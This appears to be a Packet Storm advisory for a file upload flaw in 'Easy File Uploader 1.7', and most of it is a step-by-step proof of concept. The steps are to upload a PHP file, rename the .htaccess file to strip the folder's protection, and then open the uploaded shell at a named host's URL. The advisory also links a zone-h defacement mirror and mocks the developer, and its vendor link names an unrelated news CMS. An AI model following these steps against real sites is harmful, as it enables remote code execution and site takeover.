Easy File Uploader 1.7 Shell Upload

2018-05-24T00:00:00
ID PACKETSTORM:147858
Type packetstorm
Reporter indoushka
Modified 2018-05-24T00:00:00

Description

                                        
                                            `====================================================================================================================================  
| # Title : Easy File Uploader 1.7 unrestricted file upload Vulnerability |  
| # Author : indoushka |  
| # Telegram : @indoushka |  
| # Tested on : windows 10 FranASSais V.(Pro) |  
| # Vendor : https://codecanyon.net/item/newsbee-fully-featured-news-cms-with-bootstrasp-php-mysql/19404937 |   
| # Dork : N/A |  
====================================================================================================================================  
  
  
Note : I suspect this programmer Supernatural stupidity !!!!  
  
https://www.youtube.com/watch?v=QLuRxgDpnkE&feature=youtu.be  
  
  
poc :  
  
  
[+] Dorking Adegn Google Or Other Search Enggine .  
  
[+] upload your php file & they give you link to direct download or rename your file .  
  
http://codecanyon.nelliwinne.net/EasyFileUploader/No%20SQL/download.php?id=fileFolder/example.txt  
  
[+] but the files Folder protected by .htaccess file : Deny from all ?  
  
[+] so chos any file to rename it & replace it with the .htaccess ,rename it to any or remove the dot to became htaccess  
  
http://codecanyon.nelliwinne.net/EasyFileUploader/No%20SQL/rename.php?id=x.txt  
  
[+] now upload your evil & go to : http://codecanyon.nelliwinne.net/EasyFileUploader/No%20SQL/fileFolder/x.php  
  
http://www.zone-h.org/mirror/id/31208319  
  
  
Greetings to :=========================================================================================================================  
|  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |  
|  
=======================================================================================================================================  
`